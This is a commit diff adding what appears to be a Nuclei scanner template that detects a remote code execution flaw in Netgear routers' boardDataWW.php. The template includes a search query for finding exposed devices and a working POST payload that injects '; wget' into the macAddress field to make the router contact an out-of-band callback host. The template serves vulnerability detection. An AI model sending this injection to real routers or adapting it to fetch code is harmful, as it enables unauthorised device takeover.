Create netgear-boarddataww-rce.yaml
parent
6e9f8f031e
commit
9ac9c195d7
|
@ -0,0 +1,39 @@
|
|||
id: netgear-boarddataww-rce
|
||||
|
||||
info:
|
||||
name: Netgear router boardDataWW.php - Remote Code Execution
|
||||
author: pussycat0x
|
||||
severity: high
|
||||
description: |
|
||||
There is an RCE vulnerability in boardDataWW.php of this product. Malicious attackers may use this vulnerability to execute malicious commands, eventually causing the server to crash.
|
||||
reference:
|
||||
- https://github.com/wy876/POC/blob/main/Netgear%E8%B7%AF%E7%94%B1%E5%99%A8boardDataWW.php%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md
|
||||
metadata:
|
||||
fofa-query: title=="Netgear"
|
||||
tags: rce,netgear,iot
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /boardDataWW.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>Netgear</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue